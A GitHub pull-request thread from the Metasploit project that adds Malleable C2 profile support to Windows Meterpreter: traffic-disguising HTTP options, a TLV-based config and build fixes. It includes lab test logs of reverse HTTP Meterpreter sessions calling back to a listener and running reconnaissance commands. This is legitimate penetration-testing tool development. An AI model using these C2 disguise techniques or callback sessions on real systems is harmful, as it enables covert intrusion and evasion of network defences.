Initial support for Malleable C2 Profiles in Windows Metepreter

OJ opened the pull request:
This PR contains a bunch of changes to support malleable C2 features stored in a `.profile` file (such as [this](https://github.com/BC-SECURITY/Malleable-C2-Profiles/blob/master/APT/meterpreter.profile)).

Given the nature of how Meterpreter works, and how payloads are generated, there are a lot of C2 profile features that can't be supported without drastic changes. The intent here is to focus on the transport-specific details around HTTP payloads.

For more information on what's supported, along with documentation, sample runs/etc, please see the associated [Metasploit Framework PR](https://github.com/rapid7/metasploit-framework/pull/20419).

In order to support the new features and configuration options the configuration block needed to change. Rather than expand on this rather rudimentary and outdated block of information, it was decided that the config block should be converted to a TLV Packet. That has been done as part of this PR, and is obviously a breaking change, and hence isn't backwards compatible.

This took a lot longer than I had hoped, so as of yet the other Meterpreters haven't been modified.

TODO:

- [x] Implement the code that handles the encoding flags (coming next).
- [x] Port breaking change to Python
- [x] Port breaking change to Java/Android
- [x] Port breaking change to PHP (PHP doesn't have HTTP)
- [x] Port breaking change to Mettle

OJ committed:
Tidied up up the build for make.bat and make-cmake.bat builds

Removing warnings as well as making the builds work properly outside of
Visual Studio and docker.

OJ committed:
Small tweak to the RDI cmake file

Makes sure that things build correctly across environments.

OJ committed:
MC2 first pass clean compile

Not read for push, some sections removed to avoid the pain of dev until
the rest of the work is done.

OJ committed:
Semi-working TLV-based configuration

More to do, and transport stuff needs to be updated to include the C2
configuration options.

OJ committed:
Support for different GET/POST uris

This actually stages/works as expected now. More fields to map, more
work to do. More configuration to handle. Then the changes need to also
be moved over to the WININET fallback version when done.

Still need to handle encoding as well.

OJ committed:
More C2 options support, migration work

* Packet prefixes and suffixes now work as expected (at least outbound),
  more work to do to support inbound.
* Validated that migration works.
* Support encryption key transmission across migration (need to confirm
  if this is required).

OJ committed:
Tidying up, removal of TLVs and skip count support

Referrer and accept type headers no longer separate, despite what the
APIs say they do support inclusion of them with custom headers.

Skip counts now included so the incoming packets can be prefixed in the
C2 profile.

Various other code tidies/adjustments.

OJ committed:
Update WININET implementation for C2 support

OJ committed:
UUID handling and transport refactoring

OJ committed:
Better support for UUID in GET/HEADER/URI

Various tweaks to support it on the server side as well.

OJ committed:
Fix transport commands and timeout handling

OJ committed:
Update workflow to use VS 2022 instead of VS 2019

OJ committed:
Read POST responses

POST requests were being killed off before reading the response. This
fixes that issue.

OJ commented:
Hey @smcintyre-r7 or @dledda-r7 could you have a quick look at the windows-2022 target for the visual studio build in the github actions? I changed from `windows-2019` to `windows-2022` because of a deprecation warning, but it's still failing because of a file not found issue. Based on the [documentation](https://github.com/actions/runner-images/blob/main/images/windows/Windows2022-Readme.md#visual-studio-enterprise-2022) the path to the dev env should be correct. Thanks for the help!

OJ committed:
C2 encoding and content length for HTTP reads

C2 encoding now supported in the GET/POST based on the C2 configuration.

Changed up the way the body of an HTTP response is read, so that the
content length header is used instead. This means we can read in the
entire buffer, remove prefixes/suffixes and do decoding before passing
this on. Prior to this, we were using the packet header to figure out
how much data to read, and that doesn't makes sense any more.

dledda-r7 commented on .github/workflows/windows_meterpreter.yml:
```diff
@@ -56,4 +56,4 @@ jobs:
         run: |-
           cd c/meterpreter
-          "C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat
+          "C:\Program Files (x86)\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat
```
```suggestion
          "C:\Program Files\Microsoft Visual Studio\2022\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat
```

OJ committed:
Fix path to VS for workflow build

OJ commented:
@dledda-r7  is there a way of getting the `141_xp` toolset on here? That's why the build is currently failing.

OJ commented:
> 2. Update the container VS2022 installation.
>    Now, as i was reading [here](https://learn.microsoft.com/en-us/visualstudio/install/use-command-line-parameters-to-install-visual-studio?view=vs-2022) I _think_ we can update our VS2022 instance to include our XP build. doing something like:
> 
> `C:\Program Files (x86)\Microsoft Visual Studio\Instaler\setup.exe modify --installPath "C:\Program Files\Microsoft Visual Studio\2022\Enterprise" --passive --config <metasploit-payloads>/c/meterpreter/vs-config/vs2022.config`

Correct me if I'm wrong, but would this not cause the container to be updated every time we ran a build? And if so, is that a problem?

dledda-r7 commented:
You are not wrong. the alternative would be having local runners but I am not sure we can go through that way, also including @adfoster-r7 to the loop as probably he has more knowladge on CI/CD than me.

OJ commented on c/meterpreter/source/metsrv/core.h:
```diff
@@ -37,6 +37,13 @@ DWORD packet_get_tlv(Packet *packet, TlvType type, Tlv *tlv);
 DWORD packet_get_tlv_string(Packet *packet, TlvType type, Tlv *tlv);
 DWORD packet_get_tlv_group_entry(Packet *packet, Tlv *group, TlvType type,Tlv *entry);
 DWORD packet_enum_tlv(Packet *packet, DWORD index, TlvType type, Tlv *tlv);
+DWORD packet_enum_group_tlv(Packet* packet, Tlv* group, DWORD index, TlvType type, Tlv* tlv);
+
+UINT packet_get_tlv_group_entry_value_uint(Packet* packet, Tlv* group, TlvType type);
+LPBYTE packet_get_tlv_group_entry_value_raw(Packet* packet, Tlv* group, TlvType type, DWORD* size);
+LPBYTE packet_get_tlv_group_entry_value_raw_copy(Packet* packet, Tlv* group, TlvType type, DWORD* size);
+PCHAR packet_get_tlv_group_entry_value_string(Packet *packet, Tlv *group, TlvType type, DWORD* size);
+PWCHAR packet_get_tlv_group_entry_value_wstring(Packet *packet, Tlv *group, TlvType type, DWORD* size);
```
Not as yet. I hadn't considered adding them at this point given that they weren't needed. But happy to do so as part of another PR/update.

OJ commented on c/meterpreter/source/metsrv/server_http_utils.c:
```diff
@@ -0,0 +1,272 @@
+	{
+		DWORD flags = conn->options.encode_flags == C2_ENCODING_B64 ? CRYPT_STRING_BASE64 : CRYPT_STRING_BASE64URI;
+
+		if (CryptStringToBinaryA(encodedData, encodedDataLen, flags, NULL, dataLen, NULL, NULL))
```
Agreed, plus it might be handy to have a helper function exposed in the metapi that'd do the encoding/decoding for you.

nabkingo replied:
سلام

dledda-r7 commented:
@OJ we updated the GitHub runners. Now is working with Visual Studio 2022

OJ commented:
Excellent, thanks!

zeroSteiner committed:
Refactor java TLV names

zeroSteiner committed:
Refactor to move TLVPacket and TLVType

zeroSteiner committed:
Process the config block as a TLV packet

This moves the Java Meterpreter inline with the new config block which
is now a set of TLVs instead of the former static block.

zeroSteiner committed:
Rename C2_PROXY_HOST to C2_PROXY_URL for Windows

zeroSteiner committed:
Switch to the new TLV constants in Python

zeroSteiner committed:
PATCH_URL is not PATCH_UUID

dledda-r7 commented:
@zeroSteiner, I've updated the TODO on the PR, IIRC on the PHP meterpreter nothing was needed because there is no HTTP stager / transport. Should we do at least the porting of the TLV values to avoid having incosistency among the other meterpreters?

OJ committed:
Implement manual CRYPT_STRING_BASE64URI

Windows 7 doesn't come with this option for use with the
CryptStringToBinaryA or CryptBinaryToStringA functions. This was
introduced in Windows 10. So we've got a custom implementation of this
so that we know we have a working version that doesn't cause things to
break on Windows 7.

OJ committed:
Use updated VS2022 configuration/install

This is cherry picked from the main branch just to get things going.

OJ committed:
Fix compiler complaints

dledda-r7 commented:
## Windows 7 SP0 x64 - MinGW binary
```
msf6 payload(windows/x64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8081 handling request from 10.5.132.188; (UUID: e8psav5t) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.188; (UUID: e8psav5t) Redirecting stageless connection from  with UA '' to /8du3yz_7zrxBhUCHKEaDWgSp_GcKzpPznYGWFHfqyosK20frjwhZghxRZg0OrBvSF
[!] http://192.168.3.10:8081 handling request from 10.5.132.188; (UUID: e8psav5t) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.188; (UUID: e8psav5t) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8081 handling request from 10.5.132.188; (UUID: e8psav5t) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
[*] Meterpreter session 1 opened (192.168.3.10:8081 -> 10.5.132.188:49186) at 2026-03-25 07:11:34 -0400

msf6 payload(windows/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: win7x64-sp0\msfuser
meterpreter > ls
Listing: C:\Users\msfuser\Downloads
===================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  282     fil   2025-07-22 11:15:21 -0400  desktop.ini
100777/rwxrwxrwx  577536  fil   2026-03-25 07:11:20 -0400  metsrv.c2.exe

meterpreter > sysinfo
Computer        : WIN7X64-SP0
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > 
```

## Windows 23H2 x64 - MinGW
```
msf6 payload(windows/x64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8081 handling request from 10.5.132.198; (UUID: e6uz7lig) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.198; (UUID: e6uz7lig) Redirecting stageless connection from  with UA '' to /8du3yz_7zrxBhUCHKEaqyA1dWjINwfG5zcvEsATxhimv9ad-vNOhFoE1DMWxGjxYo56jCI7L1Szu
[!] http://192.168.3.10:8081 handling request from 10.5.132.198; (UUID: e6uz7lig) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.198; (UUID: e6uz7lig) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8081 handling request from 10.5.132.198; (UUID: e6uz7lig) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
[*] Meterpreter session 3 opened (192.168.3.10:8081 -> 10.5.132.198:63903) at 2026-03-25 10:04:04 -0400

msf6 payload(windows/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 3...

meterpreter > ls
Listing: C:\Users\msfuser\Desktop
=================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  2352    fil   2026-03-25 10:00:17 -0400  Microsoft Edge.lnk
100666/rw-rw-rw-  282     fil   2026-03-25 09:59:16 -0400  desktop.ini
100777/rwxrwxrwx  577536  fil   2026-03-25 10:03:49 -0400  metsrv.c2.exe

meterpreter > sysinfo
Computer        : WIN11_23H2_4728
OS              : Windows 11 23H2 (10.0 Build 22631).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN11_23H2_4728\msfuser
meterpreter > 

```

## Windows 7 SP0 x64 - MSVC
```
msf6 payload(windows/x64/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8081 handling request from 10.5.132.188; (UUID: zick860y) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.188; (UUID: zick860y) Redirecting stageless connection from  with UA '' to /u5lSXQKdGlVi-mP4CzwBgwQY1l3Z8OwFKsxb120YyY8i4pRWOiGixIiQz4vkKv2mgZPsaisU8YR5U0texSjzhPujEa_wv4D_lT2s20zJ36
[!] http://192.168.3.10:8081 handling request from 10.5.132.188; (UUID: zick860y) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.188; (UUID: zick860y) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8081 handling request from 10.5.132.188; (UUID: zick860y) Without a database connected that payload UUID tracking will not work!

msf6 payload(windows/x64/meterpreter_reverse_http) > 
msf6 payload(windows/x64/meterpreter_reverse_http) > [*] Meterpreter session 1 opened (192.168.3.10:8081 -> 10.5.132.188:49167) at 2026-03-27 07:01:19 -0400

msf6 payload(windows/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > ls
Listing: C:\Users\msfuser\Downloads
===================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  282     fil   2025-07-22 11:15:21 -0400  desktop.ini
100777/rwxrwxrwx  309248  fil   2026-03-27 07:01:05 -0400  metsrv.c2.exe

meterpreter > getuid
Server username: win7x64-sp0\msfuser
meterpreter > sysinfo
Computer        : WIN7X64-SP0
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > 
```

## Windows 11 23H2 - MSVC
```
meterpreter > 
[!] http://192.168.3.10:8081 handling request from 10.5.132.113; (UUID: zick860y) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.113; (UUID: zick860y) Redirecting stageless connection from  with UA '' to /u5lSXQKdGlVi-mP4CzwH1w30spYN
[!] http://192.168.3.10:8081 handling request from 10.5.132.113; (UUID: zick860y) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.113; (UUID: zick860y) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8081 handling request from 10.5.132.113; (UUID: zick860y) Without a database connected that payload UUID tracking will not work!

meterpreter > nbg[*] Meterpreter session 2 opened (192.168.3.10:8081 -> 10.5.132.113:49812) at 2026-03-27 07:08:35 -0400

meterpreter > bg
[*] Backgrounding session 1...
msf6 payload(windows/x64/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : WIN11_23H2_4728
OS              : Windows 11 23H2 (10.0 Build 22631).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > ls
Listing: C:\Users\msfuser\Desktop
=================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  2348    fil   2026-03-27 07:04:52 -0400  Microsoft Edge.lnk
100666/rw-rw-rw-  282     fil   2026-03-27 07:04:21 -0400  desktop.ini
100777/rwxrwxrwx  309248  fil   2026-03-27 07:08:25 -0400  metsrv.c2.exe

meterpreter > getuid
Server username: WIN11_23H2_4728\msfuser
meterpreter > 
```

## Windows 10 22H2 x86 - MSVC
```
msf6 payload(windows/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8081 handling request from 10.5.132.102; (UUID: kx2tdij6) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.102; (UUID: kx2tdij6) Redirecting stageless connection from  with UA '' to /RIXmPysIIBn5BvgHkMB5TwcbcTyCtB
[!] http://192.168.3.10:8081 handling request from 10.5.132.102; (UUID: kx2tdij6) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.102; (UUID: kx2tdij6) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8081 handling request from 10.5.132.102; (UUID: kx2tdij6) Without a database connected that payload UUID tracking will not work!

msf6 payload(windows/meterpreter_reverse_http) > sessions -i -1[*] Meterpreter session 1 opened (192.168.3.10:8081 -> 10.5.132.102:50101) at 2026-03-27 09:04:16 -0400

[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-PCHAGVH
OS              : Windows 10 22H2+ (10.0 Build 19045).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-PCHAGVH\msfuser
meterpreter > ls
Listing: C:\Users\msfuser\Desktop
=================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  2294    fil   2025-08-07 09:25:44 -0400  Microsoft Edge.lnk
100666/rw-rw-rw-  282     fil   2025-08-07 09:25:44 -0400  desktop.ini
100777/rwxrwxrwx  266240  fil   2026-03-27 09:52:35 -0400  metsrv.c2.x86.exe

meterpreter > 
```

## Windows 7 x86 - MSVC
```
msf6 payload(windows/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8081 handling request from 10.5.132.189; (UUID: kx2tdij6) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.189; (UUID: kx2tdij6) Redirecting stageless connection from  with UA '' to /RIXmPysIIBn5BvgHkMB1fgZVvOZ3QixSlLRHpAVx0U5j13gzpglp2mzPoitnY
[!] http://192.168.3.10:8081 handling request from 10.5.132.189; (UUID: kx2tdij6) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.189; (UUID: kx2tdij6) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8081 handling request from 10.5.132.189; (UUID: kx2tdij6) Without a database connected that payload UUID tracking will not work!

msf6 payload(windows/meterpreter_reverse_http) > ses[*] Meterpreter session 2 opened (192.168.3.10:8081 -> 10.5.132.189:49169) at 2026-03-27 09:56:16 -0400

msf6 payload(windows/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : MSFUSER-PC
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > ls
Listing: C:\Users\msfuser\Downloads
===================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  282     fil   2026-01-16 07:31:00 -0500  desktop.ini
100777/rwxrwxrwx  266240  fil   2026-03-27 09:56:00 -0400  metsrv.c2.x86.exe

meterpreter > getuid
Server username: msfuser-PC\msfuser
meterpreter > 
```

## Windows 7 x86 - MinGW
```
msf6 payload(windows/meterpreter_reverse_http) > 
[!] http://192.168.3.10:8081 handling request from 10.5.132.189; (UUID: a61okg2f) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.189; (UUID: a61okg2f) Redirecting stageless connection from  with UA '' to /pKaVSqE_BZDLR8pGooFF4wQK8TWE7d-SUj2qSDL0CtdHO
[!] http://192.168.3.10:8081 handling request from 10.5.132.189; (UUID: a61okg2f) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.189; (UUID: a61okg2f) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8081 handling request from 10.5.132.189; (UUID: a61okg2f) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used
[*] Meterpreter session 1 opened (192.168.3.10:8081 -> 10.5.132.189:49186) at 2026-03-27 10:05:33 -0400

msf6 payload(windows/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : MSFUSER-PC
OS              : Windows 7 (6.1 Build 7600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > ls
Listing: C:\Users\msfuser\Downloads
===================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  282     fil   2026-01-16 07:31:00 -0500  desktop.ini
100777/rwxrwxrwx  580096  fil   2026-03-27 10:05:14 -0400  metsrv.c2.x86.exe

meterpreter > getuid
Server username: msfuser-PC\msfuser
meterpreter > 
```

## Windows 10 22H2 x86  - MinGW
```
meterpreter > 
[!] http://192.168.3.10:8081 handling request from 10.5.132.102; (UUID: a61okg2f) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.102; (UUID: a61okg2f) Redirecting stageless connection from  with UA '' to /pKaVSqE_BZDLR8pGooFENQpUqU9ntNq7dr6k
[!] http://192.168.3.10:8081 handling request from 10.5.132.102; (UUID: a61okg2f) Without a database connected that payload UUID tracking will not work!
[*] http://192.168.3.10:8081 handling request from 10.5.132.102; (UUID: a61okg2f) Attaching orphaned/stageless session...
[!] http://192.168.3.10:8081 handling request from 10.5.132.102; (UUID: a61okg2f) Without a database connected that payload UUID tracking will not work!
WARNING: Local file /home/kali/Documents/github/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used

meterpreter > bg
[*] Backgrounding session 1...
msf6 payload(windows/meterpreter_reverse_http) > sessions -i -1
[*] Starting interaction with 2...

meterpreter > [*] Meterpreter session 2 opened (192.168.3.10:8081 -> 10.5.132.102:50581) at 2026-03-27 10:08:58 -0400

meterpreter > sysinfo
Computer        : DESKTOP-PCHAGVH
OS              : Windows 10 22H2+ (10.0 Build 19045).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > ls
Listing: C:\Users\msfuser\Desktop
=================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
100666/rw-rw-rw-  2294    fil   2025-08-07 09:25:44 -0400  Microsoft Edge.lnk
100666/rw-rw-rw-  282     fil   2025-08-07 09:25:44 -0400  desktop.ini
100777/rwxrwxrwx  580096  fil   2026-03-27 10:08:43 -0400  metsrv.c2.x86.exe

meterpreter > getuid
Server username: DESKTOP-PCHAGVH\msfuser
meterpreter > 
```

OJ commented:
Thank you so much for all your help and support @dledda-r7 !! I appreciate the effort involved in getting this tested as well as helping me debug/fix/etc.
